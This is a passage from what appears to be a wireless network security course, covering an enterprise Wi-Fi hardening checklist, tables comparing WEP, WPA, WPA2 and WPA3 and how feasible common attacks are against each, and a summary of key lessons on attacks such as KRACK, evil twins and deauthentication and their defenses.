Access Point Configuration
□ WPA3-SAE or WPA2-Enterprise (NEVER WPA2-PSK for corporate networks)
□ WPS disabled on all access points (verify at the protocol level, not just the UI)
□ 802.11w (PMF) enabled (mandatory for WPA3, enable for WPA2 where supported)
□ Strong passphrase if PSK is unavoidable (20+ characters, random, not on the wall)
□ SSID broadcast: consider your environment (hiding SSID does NOT prevent discovery
but may reduce casual probing; however, it breaks some client roaming)
□ AP firmware updated to latest version (KRACK patches, etc.)
□ Management interfaces (web UI, SSH) on a separate management VLAN
□ AP radio power tuned to minimize signal leakage outside the building
Authentication Infrastructure
□ RADIUS server deployed with TLS certificate from a trusted CA
□ EAP-TLS for managed devices (strongest: mutual certificate authentication)
□ PEAP-MSCHAPv2 for BYOD with strict server certificate validation
□ Client Wi-Fi profiles pushed via MDM with CA certificate pinned
□ RADIUS server logs all authentication events (success, failure, source MAC)
□ Failed authentication rate limiting and lockout configured
□ RADIUS shared secret between APs and server is strong (32+ random characters)
Network Segmentation
□ Corporate SSID on its own VLAN (full internal access after authentication)
□ Guest SSID on isolated VLAN (internet access only, no internal resources)
□ IoT SSID on isolated VLAN (specific ports/destinations only)
□ BYOD SSID with restricted access (limited to specific applications)
□ Inter-VLAN firewall rules enforced (guest cannot reach corporate, etc.)
□ Dynamic VLAN assignment via RADIUS attributes where appropriate
Monitoring and Detection
□ Wireless IDS/IPS enabled (rogue AP detection, deauth flood detection)
□ Authorized AP inventory maintained (MAC addresses of all legitimate APs)
□ Alerts on rogue APs broadcasting your SSID
□ Alerts on deauthentication floods (potential attack in progress)
□ Regular wireless site surveys to detect unauthorized APs
□ Wireless traffic logs retained for forensic analysis
□ Periodic penetration testing of wireless infrastructure
Wireless Attack Summary and Protocol Comparison
**Wireless security protocol comparison:**
| Feature | WEP | WPA (TKIP) | WPA2 (CCMP) | WPA3 (SAE) |
|----------------------|---------------|----------------|----------------|-----------------|
| Year introduced | 1999 | 2003 | 2004 | 2018 |
| Encryption | RC4 | RC4-TKIP | AES-128-CCMP | AES-128-CCMP (min) |
| Key derivation | Static | PBKDF2 | PBKDF2 | SAE (Dragonfly) |
| IV/Nonce size | 24-bit | 48-bit | 48-bit | 48-bit |
| Integrity | CRC-32 | Michael MIC | CBC-MAC | CBC-MAC / GCM |
| Offline PSK attack | Minutes | Hours to days | Hours to days | Not possible |
| Forward secrecy | No | No | No | Yes |
| PMF (mgmt frames) | No | No | Optional | Mandatory |
| Open network encrypt | No | No | No | Yes (OWE) |
| Current status | BROKEN | Deprecated | Standard | Recommended |
**Attack feasibility by protocol:**
| Attack | WEP | WPA-TKIP | WPA2-PSK | WPA2-Enterprise | WPA3 |
|---------------------|----------|-----------|-----------|-----------------|-----------|
| Key cracking | Minutes | Partial | Offline* | N/A | Online only|
| Deauth | Yes | Yes | Yes** | Yes** | Mitigated |
| Evil twin | Yes | Yes | Partial | If misconfigured| Harder |
| KRACK | N/A | Yes | Yes*** | Yes*** | No |
| Packet injection | Yes | Limited | No | No | No |
| Eavesdropping | Minutes | Hours | With PSK* | No | No |
*Requires captured handshake + weak password
**Without 802.11w/PMF enabled
***Patched in most implementations since 2017
What You've Learned
- Wireless networks broadcast over radio, making the medium fundamentally shared and uncontrollable -- anyone within range can capture frames, and 802.11 management frames (beacons, deauth) are unencrypted in WPA2
- WEP failed catastrophically due to a 24-bit IV space (reuse in hours), the use of CRC-32 instead of a MAC (allows bit-flipping), IV sent in the clear, and weak RC4 key scheduling (FMS/PTW attacks crack keys in under a minute)
- WPA2 addresses WEP's failures with AES-CCMP encryption, per-session keys via the 4-way handshake, 48-bit nonces, and proper replay protection -- but remains vulnerable to offline dictionary attacks against captured PSK handshakes
- The 4-way handshake derives unique per-session keys (PTK) from the PMK, random nonces, and MAC addresses, ensuring that even clients sharing the same password get different encryption keys
- WPA2-PSK uses a shared password suitable for small networks; WPA2-Enterprise (802.1X/EAP) provides individual user authentication via RADIUS, enabling per-user access control and revocation
- The KRACK attack exploits retransmission of Message 3 in the 4-way handshake to force nonce reuse, breaking AES-CTR encryption guarantees -- it targets the protocol specification itself, not a specific implementation
- WPA3 introduces SAE (Dragonfly) key exchange that eliminates offline dictionary attacks by requiring active participation for each password guess, provides forward secrecy, and mandates Protected Management Frames
- Evil twin attacks mimic legitimate networks to intercept traffic; defense requires WPA2-Enterprise with strict RADIUS certificate validation, 802.11w/PMF to prevent deauth-based client steering, and wireless intrusion detection
- Deauthentication attacks exploit unprotected management frames to disconnect clients, enabling handshake capture for offline cracking, evil twin attacks, and denial of service -- mitigated by 802.11w (PMF, mandatory in WPA3)
- Enterprise wireless architecture requires centralized management via a wireless controller, RADIUS-based 802.1X authentication, network segmentation (separate VLANs for corporate, BYOD, guest, and IoT), rogue AP detection, and device posture checking
- For the strongest wireless security: use WPA3-Enterprise with EAP-TLS (mutual certificate authentication), enable PMF, segment networks by trust level, and monitor for rogue access points and attack patterns